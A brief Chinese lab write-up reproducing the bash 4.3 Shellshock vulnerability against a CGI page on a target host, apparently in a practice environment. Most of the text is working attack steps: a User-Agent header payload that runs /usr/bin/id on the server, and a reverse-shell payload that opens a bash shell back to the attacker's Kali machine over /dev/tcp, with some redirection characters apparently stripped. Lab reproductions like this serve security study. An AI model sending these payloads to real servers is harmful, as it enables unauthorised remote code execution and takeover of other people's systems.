Bash是Unix系统和Linux系统的一种Shell命令行环境是目前绝大多数Linux发行版的默认Shellbash4.3存在一处破壳漏洞。漏洞复现机器IPkali10.132.1.173靶机10.22.146.13靶机启动后victim.cgi是bash4.3生成的页面。访问http://10.22.146.13/victim.cgi漏洞利用使用burpsuite抓包将payload附在User-Agent中访问victim.cgiUser-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id命令成功被执行。反弹shell使用以下反弹shell命令ip为kali的ip地址端口1234() { :; }; echo; /bin/bash -i /dev/tcp/10.132.1.173/1234 01本地kali监听端口1234然后将反弹shell附在User-Agent中访问victim.cgiUser-Agent:() { :; }; echo; /bin/bash -i /dev/tcp/10.132.1.173/1234 01漏洞利用成功拿到来自目标的反弹shell。